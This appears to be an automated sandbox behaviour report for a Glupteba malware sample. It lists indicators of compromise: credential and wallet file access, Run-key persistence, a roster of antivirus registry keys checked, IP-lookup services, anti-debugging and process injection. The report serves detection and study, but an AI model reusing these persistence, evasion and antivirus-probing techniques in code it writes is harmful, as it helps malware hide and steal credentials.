glupteba | 610d9028a1aac20684ad5bf0b6c0212016eceb3d6d4563cead3c398aac441c5b

System Information Discovery

Processes:

setups.tmpcmd.exesetups.tmpCefyshimewe.exeHosamimajae.exe

description	ioc	process
Key value queried	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Control Panel\International\Geo\Nation	setups.tmp
Key value queried	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Control Panel\International\Geo\Nation	cmd.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Control Panel\International\Geo\Nation	setups.tmp
Key value queried	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Control Panel\International\Geo\Nation	Cefyshimewe.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Control Panel\International\Geo\Nation	Hosamimajae.exe

Loads dropped DLL 64 IoCs

Processes:

setups.tmp3a4so11jiil.tmpSetup3310.tmpIBInstaller_97039.tmpvpn.tmprfpvo2layxa.exeregsvr32.exeregsvr32.exeMsiExec.exeLabPicV3.tmplylal220.tmprundll32.exesetups.tmpMsiExec.exewinxsl.exei-record.exeSetup3310.tmpgaooo.exetoolspab1.exerundll32.exe

pid	process
4092	setups.tmp
4092	setups.tmp
4092	setups.tmp
4092	setups.tmp
4092	setups.tmp
4092	setups.tmp
4092	setups.tmp
4756	3a4so11jiil.tmp
3104	Setup3310.tmp
3104	Setup3310.tmp
4336	IBInstaller_97039.tmp
4364	vpn.tmp
4364	vpn.tmp
4364	vpn.tmp
4364	vpn.tmp
4364	vpn.tmp
4364	vpn.tmp
4364	vpn.tmp
4364	vpn.tmp
4284	rfpvo2layxa.exe
580	regsvr32.exe
4848	regsvr32.exe
4128	MsiExec.exe
4128	MsiExec.exe
5252	LabPicV3.tmp
4128	MsiExec.exe
5288	lylal220.tmp
5944	rundll32.exe
5996	setups.tmp
5996	setups.tmp
5996	setups.tmp
5996	setups.tmp
5996	setups.tmp
5996	setups.tmp
5996	setups.tmp
3784	MsiExec.exe
3784	MsiExec.exe
3784	MsiExec.exe
3784	MsiExec.exe
3784	MsiExec.exe
3784	MsiExec.exe
5892	winxsl.exe
5892	winxsl.exe
3784	MsiExec.exe
3784	MsiExec.exe
3784	MsiExec.exe
3784	MsiExec.exe
6852	i-record.exe
6852	i-record.exe
6852	i-record.exe
6980	Setup3310.tmp
6980	Setup3310.tmp
6852	i-record.exe
6852	i-record.exe
6852	i-record.exe
6852	i-record.exe
6852	i-record.exe
6852	i-record.exe
7064	gaooo.exe
7064	gaooo.exe
7064	gaooo.exe
7064	gaooo.exe
2796	toolspab1.exe
7996	rundll32.exe

Reads local data of messenger clients 2 TTPs
Infostealers often target stored data of messaging applications, which can include saved credentials and account information.
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081
Accesses 2FA software files, possible credential harvesting 2 TTPs
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials in Files
T1081

Adds Run key to start application 2 TTPs 6 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

Processes:

multitimer.exealpATCHInO.exeysAGEL.exemultitimer.exehjjgaa.exe8625598.exe

description	ioc	process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\jtrrp3ekean = "\"C:\\Users\\Admin\\AppData\\Local\\Temp\\CL81DXK9H5\\multitimer.exe\" 1 3.1618062489.6071ac99c1607"	multitimer.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\system recover = "\"C:\\Program Files (x86)\\WindowsPowerShell\\Xejacamijo.exe\""	alpATCHInO.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\system recover = "\"C:\\Program Files (x86)\\Google\\Fozhashamesa.exe\""	ysAGEL.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\31vzcsiscws = "\"C:\\Users\\Admin\\AppData\\Local\\Temp\\UKKSRIAFWU\\multitimer.exe\" 1 3.1618062453.6071ac75c7623"	multitimer.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\haleng = "C:\\Users\\Admin\\AppData\\Local\\Temp\\haleng.exe"	hjjgaa.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\Microsoft\Windows\CurrentVersion\Run\Windows Host = "C:\\ProgramData\\Windows Host\\Windows Host.exe"	8625598.exe

Checks for any installed AV software in registry 1 TTPs 64 IoCs

Security Software Discovery

T1063

Processes:

multitimer.exemultitimer.exe

description	ioc	process
Key opened	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\Jiangmin\ComputerID	multitimer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\DrWebAVService	multitimer.exe
Key opened	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\SOFTWARE\Microsoft\Microsoft Antimalware Setup\StartMenu Microsoft Security Essentials	multitimer.exe
Key opened	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\FRISK Software\F-PROT Antivirus for Windows	multitimer.exe
Key opened	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\SOFTWARE\AhnLab\V3IS80	multitimer.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\F-Secure\Computer Security\DART	multitimer.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\AhnLab\V3IS80	multitimer.exe
Key opened	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\SOFTWARE\COMODO\CIS	multitimer.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Doctor Web\InstalledComponents	multitimer.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\ClamWin\Version	multitimer.exe
Key opened	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\Vba32\Loader	multitimer.exe
Key opened	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\G Data\AntiVirenKit	multitimer.exe
Key opened	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\SOFTWARE\Doctor Web\InstalledComponents	multitimer.exe
Key opened	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\SOFTWARE\KasperskyLab	multitimer.exe
Key opened	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\McAfee\DesktopProtection	multitimer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\DrWebAVService	multitimer.exe
Key opened	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\ArcaBit	multitimer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\McAPExe	multitimer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\AVP18.0.0	multitimer.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\AVAST Software\Avast	multitimer.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Doctor Web\InstalledComponents	multitimer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\AntiVirService	multitimer.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\AVAST Software\Avast	multitimer.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\ClamWin\Version	multitimer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\AVP18.0.0	multitimer.exe
Key opened	\REGISTRY\MACHINE\Software\Avira\Antivirus	multitimer.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\AhnLab\V3IS80	multitimer.exe
Key opened	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\ArcaBit	multitimer.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\ClamWin\Version	multitimer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\BavSvc	multitimer.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Doctor Web\InstalledComponents	multitimer.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\AVG\AV	multitimer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\AntiVirService	multitimer.exe
Key opened	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\Sophos	multitimer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\BavSvc	multitimer.exe
Key opened	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\SOFTWARE\AVAST Software\Avast	multitimer.exe
Key opened	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\SOFTWARE\Doctor Web\InstalledComponents	multitimer.exe
Key opened	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\Bitdefender\QuickScan	multitimer.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\COMODO\CIS	multitimer.exe
Key opened	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\SOFTWARE\KasperskyLab	multitimer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet\Services\MBAMProtector	multitimer.exe
Key opened	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\SOFTWARE\COMODO\CIS	multitimer.exe
Key opened	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\Bitdefender\QuickScan	multitimer.exe
Key opened	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\Fortinet\FortiClient\installed	multitimer.exe
Key opened	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\SOFTWARE\Microsoft\Microsoft Antimalware Setup\StartMenu Microsoft Security Essentials	multitimer.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\F-Secure\Computer Security\DART	multitimer.exe
Key opened	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\SOFTWARE\F-Secure\Computer Security\DART	multitimer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\QHActiveDefense	multitimer.exe
Key opened	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\K7 Computing\K7TotalSecurity	multitimer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\McAPExe	multitimer.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\ESET\NOD	multitimer.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\ESET\NOD	multitimer.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\AhnLab\V3IS80	multitimer.exe
Key opened	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\SOFTWARE\ClamWin\Version	multitimer.exe
Key opened	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\SOFTWARE\ESET\NOD	multitimer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\avast! Antivirus	multitimer.exe
Key opened	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\FRISK Software\F-PROT Antivirus for Windows	multitimer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\QHActiveDefense	multitimer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet\Services\MBAMProtector	multitimer.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\ESET\NOD	multitimer.exe
Key opened	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\SOFTWARE\AVG\AV	multitimer.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Microsoft Antimalware Setup\StartMenu Microsoft Security Essentials	multitimer.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Microsoft Antimalware Setup\StartMenu Microsoft Security Essentials	multitimer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\avast! Antivirus	multitimer.exe

Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012

Checks whether UAC is enabled 1 TTPs 3 IoCs

evasion trojan

System Information Discovery

Processes:

jg7_7wjg.exejg8_8qyu.exejg8_8qyu.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	jg7_7wjg.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	jg8_8qyu.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	jg8_8qyu.exe

Enumerates connected drives 3 TTPs 48 IoCs

Attempts to read the root path of hard drives other than the default C: drive.

Query Registry

Peripheral Device Discovery

System Information Discovery

Processes:

rfpvo2layxa.exemsiexec.exe

description	ioc	process
File opened (read-only)	\??\W:	rfpvo2layxa.exe
File opened (read-only)	\??\Y:	rfpvo2layxa.exe
File opened (read-only)	\??\Z:	rfpvo2layxa.exe
File opened (read-only)	\??\P:	msiexec.exe
File opened (read-only)	\??\V:	msiexec.exe
File opened (read-only)	\??\L:	rfpvo2layxa.exe
File opened (read-only)	\??\S:	rfpvo2layxa.exe
File opened (read-only)	\??\T:	msiexec.exe
File opened (read-only)	\??\Z:	msiexec.exe
File opened (read-only)	\??\R:	msiexec.exe
File opened (read-only)	\??\A:	rfpvo2layxa.exe
File opened (read-only)	\??\B:	rfpvo2layxa.exe
File opened (read-only)	\??\E:	rfpvo2layxa.exe
File opened (read-only)	\??\O:	rfpvo2layxa.exe
File opened (read-only)	\??\B:	msiexec.exe
File opened (read-only)	\??\J:	msiexec.exe
File opened (read-only)	\??\N:	msiexec.exe
File opened (read-only)	\??\X:	msiexec.exe
File opened (read-only)	\??\H:	rfpvo2layxa.exe
File opened (read-only)	\??\I:	rfpvo2layxa.exe
File opened (read-only)	\??\R:	rfpvo2layxa.exe
File opened (read-only)	\??\A:	msiexec.exe
File opened (read-only)	\??\F:	msiexec.exe
File opened (read-only)	\??\L:	msiexec.exe
File opened (read-only)	\??\U:	msiexec.exe
File opened (read-only)	\??\F:	rfpvo2layxa.exe
File opened (read-only)	\??\M:	rfpvo2layxa.exe
File opened (read-only)	\??\X:	rfpvo2layxa.exe
File opened (read-only)	\??\I:	msiexec.exe
File opened (read-only)	\??\K:	msiexec.exe
File opened (read-only)	\??\Q:	msiexec.exe
File opened (read-only)	\??\M:	msiexec.exe
File opened (read-only)	\??\G:	rfpvo2layxa.exe
File opened (read-only)	\??\K:	rfpvo2layxa.exe
File opened (read-only)	\??\N:	rfpvo2layxa.exe
File opened (read-only)	\??\P:	rfpvo2layxa.exe
File opened (read-only)	\??\U:	rfpvo2layxa.exe
File opened (read-only)	\??\E:	msiexec.exe
File opened (read-only)	\??\H:	msiexec.exe
File opened (read-only)	\??\J:	rfpvo2layxa.exe
File opened (read-only)	\??\T:	rfpvo2layxa.exe
File opened (read-only)	\??\G:	msiexec.exe
File opened (read-only)	\??\O:	msiexec.exe
File opened (read-only)	\??\Y:	msiexec.exe
File opened (read-only)	\??\Q:	rfpvo2layxa.exe
File opened (read-only)	\??\V:	rfpvo2layxa.exe
File opened (read-only)	\??\S:	msiexec.exe
File opened (read-only)	\??\W:	msiexec.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs

Web Service
T1102
Looks up external IP address via web service 6 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.

Processes:

flow ioc

90 ipinfo.io
116 ip-api.com
211 ipinfo.io
217 ipinfo.io
234 ip-api.com
86 ipinfo.io

flow	ioc
90	ipinfo.io
116	ip-api.com
211	ipinfo.io
217	ipinfo.io
234	ip-api.com
86	ipinfo.io

Maps connected drives based on registry 3 TTPs 2 IoCs

Disk information is often read in order to detect sandboxing environments.

Query Registry

Peripheral Device Discovery

System Information Discovery

Processes:

multitimer.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\Disk\Enum	multitimer.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Disk\Enum\0	multitimer.exe

Drops file in System32 directory 20 IoCs

Processes:

svchost.exeDrvInst.exetapinstall.exeDrvInst.exe

description	ioc	process
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\counters2.dat	svchost.exe
File created	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\INetCookies\OAB1V5DT.cookie	svchost.exe
File opened for modification	C:\Windows\System32\DriverStore\Temp\{05303374-2215-5845-afb5-f97d38eeed02}\SET28D7.tmp	DrvInst.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\INetCookies\OAB1V5DT.cookie	svchost.exe
File opened for modification	C:\Windows\System32\DriverStore\Temp\{05303374-2215-5845-afb5-f97d38eeed02}\SET28D8.tmp	DrvInst.exe
File created	C:\Windows\System32\DriverStore\drvstore.tmp	DrvInst.exe
File opened for modification	C:\Windows\System32\DriverStore\FileRepository\oemvista.inf_amd64_a572b7f20c402d28\tap0901.sys	DrvInst.exe
File opened for modification	C:\Windows\System32\CatRoot2\dberr.txt	DrvInst.exe
File created	C:\Windows\System32\DriverStore\Temp\{05303374-2215-5845-afb5-f97d38eeed02}\SET28D7.tmp	DrvInst.exe
File opened for modification	C:\Windows\System32\DriverStore\FileRepository\oemvista.inf_amd64_a572b7f20c402d28\oemvista.inf	DrvInst.exe
File opened for modification	C:\Windows\System32\DriverStore\Temp\{05303374-2215-5845-afb5-f97d38eeed02}	DrvInst.exe
File opened for modification	C:\Windows\System32\DriverStore\Temp\{05303374-2215-5845-afb5-f97d38eeed02}\tap0901.sys	DrvInst.exe
File opened for modification	C:\Windows\System32\DriverStore\FileRepository\oemvista.inf_amd64_a572b7f20c402d28\tap0901.cat	DrvInst.exe
File created	C:\Windows\System32\DriverStore\FileRepository\oemvista.inf_amd64_a572b7f20c402d28\oemvista.PNF	tapinstall.exe
File opened for modification	C:\Windows\System32\DriverStore\Temp\{05303374-2215-5845-afb5-f97d38eeed02}\SET28D6.tmp	DrvInst.exe
File created	C:\Windows\System32\DriverStore\Temp\{05303374-2215-5845-afb5-f97d38eeed02}\SET28D6.tmp	DrvInst.exe
File opened for modification	C:\Windows\System32\DriverStore\Temp\{05303374-2215-5845-afb5-f97d38eeed02}\oemvista.inf	DrvInst.exe
File opened for modification	C:\Windows\System32\DriverStore\Temp\{05303374-2215-5845-afb5-f97d38eeed02}\tap0901.cat	DrvInst.exe
File created	C:\Windows\System32\DriverStore\Temp\{05303374-2215-5845-afb5-f97d38eeed02}\SET28D8.tmp	DrvInst.exe
File created	C:\Windows\System32\DriverStore\FileRepository\oemvista.inf_amd64_a572b7f20c402d28\oemvista.PNF	DrvInst.exe

Suspicious use of NtSetInformationThreadHideFromDebugger 3 IoCs

Processes:

mask_svc.exemask_svc.exemask_svc.exe

pid process

7740 mask_svc.exe
7988 mask_svc.exe
6324 mask_svc.exe

pid	process
7740	mask_svc.exe
7988	mask_svc.exe
6324	mask_svc.exe

Suspicious use of SetThreadContext 5 IoCs

Processes:

Conhost.exesvchost.exeEIWNPZWleLKv.exetoolspab1.exetoolspab1.exe

description	pid	process	target process
PID 5824 set thread context of 5892	5824	Conhost.exe	winxsl.exe
PID 1872 set thread context of 4980	1872	svchost.exe	svchost.exe
PID 5156 set thread context of 4732	5156	EIWNPZWleLKv.exe	AddInProcess32.exe
PID 7196 set thread context of 3452	7196	toolspab1.exe	toolspab1.exe
PID 2796 set thread context of 7900	2796	toolspab1.exe	toolspab1.exe

Drops file in Program Files directory 64 IoCs

Processes:

vpn.tmpIBInstaller_97039.tmpirecord.tmpSetup.exeprolab.tmpConhost.exeMsiExec.exe3a4so11jiil.tmpjg7_7wjg.exeysAGEL.exeSetup.exealpATCHInO.exe

description	ioc	process
File created	C:\Program Files (x86)\MaskVPN\driver\winxp64\is-6JCN4.tmp	vpn.tmp
File opened for modification	C:\Program Files (x86)\Installation V156\mrmsupport.dll	IBInstaller_97039.tmp
File created	C:\Program Files (x86)\Installation V156\is-70EDG.tmp	IBInstaller_97039.tmp
File created	C:\Program Files (x86)\Installation V156\is-8LBVT.tmp	IBInstaller_97039.tmp
File opened for modification	C:\Program Files (x86)\i-record\AForge.Video.dll	irecord.tmp
File opened for modification	C:\Program Files (x86)\i-record\swresample-0.dll	irecord.tmp
File created	C:\Program Files (x86)\i-record\is-PCSHK.tmp	irecord.tmp
File opened for modification	C:\Program Files (x86)\Installation V156\stdvcl40.dll	IBInstaller_97039.tmp
File opened for modification	C:\Program Files (x86)\MaskVPN\MaskVPN.exe	vpn.tmp
File opened for modification	C:\Program Files (x86)\94c45254-6d52-40cc-93fb-b69707383880\Versium Research\LabPicV3.exe	Setup.exe
File created	C:\Program Files (x86)\MaskVPN\unins000.dat	vpn.tmp
File created	C:\Program Files (x86)\MaskVPN\is-1FEQD.tmp	vpn.tmp
File created	C:\Program Files (x86)\Picture Lab\is-PONE3.tmp	prolab.tmp
File opened for modification	C:\Program Files\hprof.dll	Conhost.exe
File opened for modification	C:\Program Files (x86)\Installation V156\javafx_font_t2k.dll	IBInstaller_97039.tmp
File opened for modification	C:\Program Files (x86)\Installation V156\libmpc-3.dll	IBInstaller_97039.tmp
File opened for modification	C:\Program Files (x86)\MaskVPN\driver\win764\tapinstall.exe	vpn.tmp
File created	C:\Program Files\unins.vbs	MsiExec.exe
File created	C:\Program Files\jp2native.dll	MsiExec.exe
File opened for modification	C:\Program Files (x86)\Picture Lab\WeifenLuo.WinFormsUI.dll	prolab.tmp
File opened for modification	C:\Program Files (x86)\i-record\avfilter-2.dll	irecord.tmp
File created	C:\Program Files (x86)\viewerise\is-O3E85.tmp	3a4so11jiil.tmp
File created	C:\Program Files (x86)\Installation V156\is-BCF7A.tmp	IBInstaller_97039.tmp
File opened for modification	C:\Program Files (x86)\94c45254-6d52-40cc-93fb-b69707383880\Versium Research\Raw4vpn.exe	Setup.exe
File created	C:\Program Files (x86)\MaskVPN\driver\winxp64\is-JCA9N.tmp	vpn.tmp
File created	C:\Program Files\api-ms-win-crt-convert-l1-1-0.dll	MsiExec.exe
File opened for modification	C:\Program Files (x86)\i-record\i-record.exe	irecord.tmp
File created	C:\Program Files (x86)\i-record\is-1N9B0.tmp	irecord.tmp
File opened for modification	C:\Program Files (x86)\94c45254-6d52-40cc-93fb-b69707383880\Versium Research\d.INTEG.RAW	jg7_7wjg.exe
File created	C:\Program Files (x86)\MaskVPN\is-L6012.tmp	vpn.tmp
File created	C:\Program Files (x86)\MaskVPN\is-GA5N5.tmp	vpn.tmp
File created	C:\Program Files (x86)\MaskVPN\driver\win732\is-27R41.tmp	vpn.tmp
File opened for modification	C:\Program Files (x86)\MaskVPN\driver\winxp32\devcon.exe	vpn.tmp
File created	C:\Program Files (x86)\MaskVPN\is-VH2RA.tmp	vpn.tmp
File opened for modification	C:\Program Files (x86)\i-record\avcodec-53.dll	irecord.tmp
File opened for modification	C:\Program Files\jp2iexp.dll	Conhost.exe
File opened for modification	C:\Program Files (x86)\Installation V156\libstdc++-6.dll	IBInstaller_97039.tmp
File created	C:\Program Files (x86)\Installation V156\is-4VV04.tmp	IBInstaller_97039.tmp
File opened for modification	C:\Program Files (x86)\MaskVPN\polstore.dll	vpn.tmp
File created	C:\Program Files\api-ms-win-crt-runtime-l1-1-0.dll	MsiExec.exe
File opened for modification	C:\Program Files (x86)\Picture Lab\AForge.dll	prolab.tmp
File created	C:\Program Files (x86)\Picture Lab\is-GLE0L.tmp	prolab.tmp
File created	C:\Program Files (x86)\Picture Lab\is-QEEEP.tmp	prolab.tmp
File created	C:\Program Files (x86)\i-record\is-GQ8A5.tmp	irecord.tmp
File opened for modification	C:\Program Files (x86)\viewerise\unins000.dat	3a4so11jiil.tmp
File created	C:\Program Files (x86)\Installation V156\is-91OO4.tmp	IBInstaller_97039.tmp
File created	C:\Program Files (x86)\MaskVPN\driver\winxp32\is-STPTR.tmp	vpn.tmp
File created	C:\Program Files (x86)\i-record\is-EVT8J.tmp	irecord.tmp
File created	C:\Program Files (x86)\94c45254-6d52-40cc-93fb-b69707383880\Versium Research\d.jfm	jg7_7wjg.exe
File created	C:\Program Files (x86)\Google\Fozhashamesa.exe.config	ysAGEL.exe
File opened for modification	C:\Program Files (x86)\i-record\postproc-52.dll	irecord.tmp
File opened for modification	C:\Program Files (x86)\94c45254-6d52-40cc-93fb-b69707383880\Versium Research\hjjgaa.exe	Setup.exe
File created	C:\Program Files (x86)\Installation V156\is-LML7H.tmp	IBInstaller_97039.tmp
File created	C:\Program Files (x86)\WindowsPowerShell\Xejacamijo.exe	alpATCHInO.exe
File created	C:\Program Files (x86)\Picture Lab\unins000.dat	prolab.tmp
File created	C:\Program Files (x86)\MaskVPN\driver\winxp32\is-7PUUK.tmp	vpn.tmp
File created	C:\Program Files (x86)\Picture Lab\is-B1SIV.tmp	prolab.tmp
File created	C:\Program Files (x86)\i-record\is-VOOR0.tmp	irecord.tmp
File opened for modification	C:\Program Files (x86)\Installation V156\Swap.dll	IBInstaller_97039.tmp
File created	C:\Program Files (x86)\MaskVPN\driver\win764\is-A7CDQ.tmp	vpn.tmp
File created	C:\Program Files (x86)\MaskVPN\driver\win764\is-V2OQ8.tmp	vpn.tmp
File created	C:\Program Files (x86)\Picture Lab\is-C4F78.tmp	prolab.tmp
File created	C:\Program Files (x86)\Google\Fozhashamesa.exe	ysAGEL.exe
File opened for modification	C:\Program Files (x86)\i-record\avformat-53.dll	irecord.tmp

Drops file in Windows directory 31 IoCs

Processes:

msiexec.exeDrvInst.exeMicrosoftEdge.exeDrvInst.exemultitimer.exemultitimer.exetapinstall.exesvchost.exeMicrosoftEdge.exeMicrosoftEdge.exe

description	ioc	process
File created	C:\Windows\Installer\inprogressinstallinfo.ipi	msiexec.exe
File created	C:\Windows\Installer\SourceHash{B59E6947-D960-4A88-902E-F387AFD7DF1F}	msiexec.exe
File opened for modification	C:\Windows\INF\setupapi.dev.log	DrvInst.exe
File opened for modification	C:\Windows\Debug\ESE.TXT	MicrosoftEdge.exe
File created	C:\Windows\INF\oem2.PNF	DrvInst.exe
File opened for modification	C:\Windows\Installer\MSIBD89.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\MSIC5E8.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\MSIC973.tmp	msiexec.exe
File created	C:\Windows\Microsoft.NET\Framework64\v2.0.50727\config\security.config.cch.new	multitimer.exe
File created	C:\Windows\Microsoft.NET\Framework64\v2.0.50727\config\enterprisesec.config.cch.new	multitimer.exe
File opened for modification	C:\Windows\Installer\MSIE754.tmp	msiexec.exe
File opened for modification	C:\Windows\inf\oem2.inf	DrvInst.exe
File opened for modification	C:\Windows\Installer\MSIDCF0.tmp	msiexec.exe
File opened for modification	C:\Windows\INF\setupapi.dev.log	tapinstall.exe
File created	C:\Windows\Microsoft.NET\Framework64\v2.0.50727\config\security.config.cch.new	multitimer.exe
File opened for modification	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.log	msiexec.exe
File opened for modification	C:\Windows\Installer\MSICD8B.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\	msiexec.exe
File opened for modification	C:\Windows\INF\setupapi.dev.log	DrvInst.exe
File opened for modification	C:\Windows\Installer\f74b0b8.msi	msiexec.exe
File created	C:\Windows\Microsoft.NET\Framework64\v2.0.50727\config\enterprisesec.config.cch.new	multitimer.exe
File created	C:\Windows\inf\oem2.inf	DrvInst.exe
File opened for modification	C:\Windows\INF\setupapi.dev.log	svchost.exe
File opened for modification	C:\Windows\Installer\MSICE57.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\MSIDC04.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\MSIDC63.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\MSIDE0B.tmp	msiexec.exe
File opened for modification	C:\Windows\Debug\ESE.TXT	MicrosoftEdge.exe
File opened for modification	C:\Windows\Debug\ESE.TXT	MicrosoftEdge.exe
File created	C:\Windows\Installer\f74b0b8.msi	msiexec.exe
File opened for modification	C:\Windows\Installer\MSIC337.tmp	msiexec.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Program crash 14 IoCs

Processes:

WerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exe

pid	pid_target	process	target process
1232	4836	WerFault.exe	0c41bq5hfhj.exe
4060	4836	WerFault.exe	0c41bq5hfhj.exe
5548	4836	WerFault.exe	0c41bq5hfhj.exe
5716	4836	WerFault.exe	0c41bq5hfhj.exe
5928	4836	WerFault.exe	0c41bq5hfhj.exe
5360	4836	WerFault.exe	0c41bq5hfhj.exe
5024	4836	WerFault.exe	0c41bq5hfhj.exe
7264	6908	WerFault.exe	qkthdrfkkoe.exe
7440	6908	WerFault.exe	qkthdrfkkoe.exe
7756	6908	WerFault.exe	qkthdrfkkoe.exe
7916	6908	WerFault.exe	qkthdrfkkoe.exe
